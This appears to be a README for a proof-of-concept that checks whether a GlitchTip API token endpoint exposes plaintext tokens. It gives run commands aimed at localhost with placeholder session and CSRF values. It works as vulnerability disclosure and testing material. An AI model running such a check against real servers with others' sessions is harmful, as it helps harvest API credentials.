## https://sploitus.com/exploit?id=BCA6139D-6929-587C-AC5B-6B290E2570E6
# GlitchTip plaintext API token exposure PoC
This PoC checks whether a local GlitchTip API token endpoint response includes a plaintext `token` field.
## Install
```sh
npm install
```
## Steps to reproduce
```sh
npx ts-node .\glitchtip-plaintext-api-tokens-poc.ts --url http://localhost:8000 --path /api/0/api-tokens/ --session-id SESSION_ID
```
Optional CSRF token:
```sh
npx ts-node .\glitchtip-plaintext-api-tokens-poc.ts --url http://localhost:8000 --path /api/0/api-tokens/ --session-id SESSION_ID --csrf-token CSRF_TOKEN
```
1. Use a local session ID from a test environment.
2. Run the endpoint check command.
3. Inspect the PoC output for detected token fields.
## Expected vulnerable behavior
If the response contains a non-empty plaintext `token` field, the script reports potential exposure.